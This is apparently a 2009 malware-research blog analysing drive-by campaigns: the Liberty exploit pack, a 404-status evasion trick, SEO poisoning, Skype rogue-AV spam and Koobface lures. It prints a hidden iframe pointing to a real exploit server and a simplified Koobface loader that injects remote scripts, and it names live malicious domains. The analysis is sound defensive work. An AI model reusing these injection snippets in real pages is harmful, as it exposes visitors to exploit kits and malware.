marco
blog
Menu:
Liberty exploit toolkit
October 8, 2009
Here is another exploit toolkit that has been making the rounds
recently: the Liberty exploit pack. Most notably, in mid-September,
Liberty was used in a drive-by-download campaign that injected iframes
pointing at searra-ditol.cn and embrari-1.cn into a large number of
vulnerable web sites.
A couple of pages from the toolkit admin panel:
The browser statistics page:
The referrer statistics page:
Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.
JavaScript anti-analysis tricks: 404 status code
October 4, 2009
Here is an old trick for foiling manual and automated analysis of malicious pages that I still see used from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Regularly, this error message indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correcting the error. However, in the case of malicious pages that use this trick, the body of the apparently missing page contains code that attempts to exploit some browser vulnerabilities or to redirects to other malicious web sites.
The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:
HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html
<iframe src="http://213.163.89.54/lib/index.php"
width=0 height=0
style="hidden"
frameborder=0 marginheight=0 marginwidth=0
scrolling=no>
</iframe>
The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 error code would not reveal any wrongdoing. A complete analysis instead (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection a malicious PDF and Flash files are delivered to the visitor's browser.
SEO to the top
October 2, 2009
A couple of days ago, Stephan Chenette of Websense had a nice post out on an active SEO campaign (in the following days, Websense has also released an alert to discuss how the campaign abuses the launch of Google Wave).
I am also following this campaign, which seems quite widespread, in terms of the number of web sites and search terms that are involved. Unfortunately, the campaign is also successful in pushing some of its malicious pages high up in the results returned for popular query terms by Google.
Here is a case where they even make it to the top spot:
As explained in Chenette's post, the malicious results (in red in the figure above) redirect to sites that push rogue AV software.
No doubt, the taste of that John Dory is going to be quite... sour.
Rogue AV...via Skype
October 1, 2009
A new (at least for me) twist on the distribution of rogue AV software. Skype
user online.notification.america17, whose full name is, cleverly enough,
Online Notification, sent me a chat (see below) to inform me that the "Security
Center has detected malware on my computer".
The URL that is referenced in the message (www.securonline.net) is currently down, but is listed in several blacklists, for example, hpHosts and WOT.
A gallery of fake koobface pages
September 29, 2009
Long time, no write... but I thought this could be a good occasion to start again.
It looks like the Koobface people have been busy updating their social engineering tricks. But let's start from the beginning. I was inspecting fnplbpnbvxqjrey.blogspot.com, a BlogSpot's blog that Wepawet flagged as suspicious and involved in pushing Koobface (see the Wepawet report for fnplbpnbvxqjrey.blogspot.com). At first sight, the blog appears to be just one of the many BlogSpot pages involved in this activity.
However, a closer look at the source code of the page reveals something interesting. The code responsible for actually redirecting to Koobface is a fairly recent variant (I have seen it used as early as 2009-09-12). Here is a slightly simplified listing of this code:
var ogxbjeqrihscndvz6 = [ /* list of server IPs */ ];
var mzvtonlxsjprcb5 = '';
cvuhxdinmlqjoeft1();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
n = parseInt(location.href.substr(n + 4));
if (n < 101)
js = '/cnet';
else if (n < 201)
js = '/warn';
else if (n < 301)
js = '/scan';
else if (n < 401)
js = '';
}
for (var onwxklrqhybjvpase3 = 0;
onwxklrqhybjvpase3 < ogxbjeqrihscndvz6.length;
onwxklrqhybjvpase3 ++) {
var ypcovhrtbmn8 = document.createElement('script');
ypcovhrtbmn8.type = 'text/javascript';
ypcovhrtbmn8.src = 'http://' + ogxbjeqrihscndvz6[onwxklrqhybjvpase3] +
'/go' + '.js' + '?0x3' + 'E8' + mzvtonlxsjprcb5 + js + '/' +
(location.search.length > 0 ? location.search : '');
document.getElementsByTagName('head')[0].appendChild(ypcovhrtbmn8);
}
The script loops over an array that holds the IPs of compromised
machines where visitors of the malicious blog will be redirected to. For
each IP, an HTML script tag is added to the page. The tag is set to
point to a URL on the compromised IP. Depending on certain conditions,
the path of the URLs will contain one of the following strings: /view,
/cnet, /warn, /scan.
When the redirection finally is triggered, the victim is presented with a
different page, depending on which of these strings was included
in the URL.
All the pages attempt to social engineer visitors into downloading and installing the Koobface malware. Here are screenshots that show the tricks they use:
- Classic Facebook fake video page
- Fake YouTube (actually, YuoTube) page (
/view)
- Fake CNET page (
/cnet)
- Fake scan page (
/scan)
- And, my favorite, the self-referential fake page on Facebook that warns
about the Koobface malware (
/warn):
Just a few more aces up Koobface's sleeve...
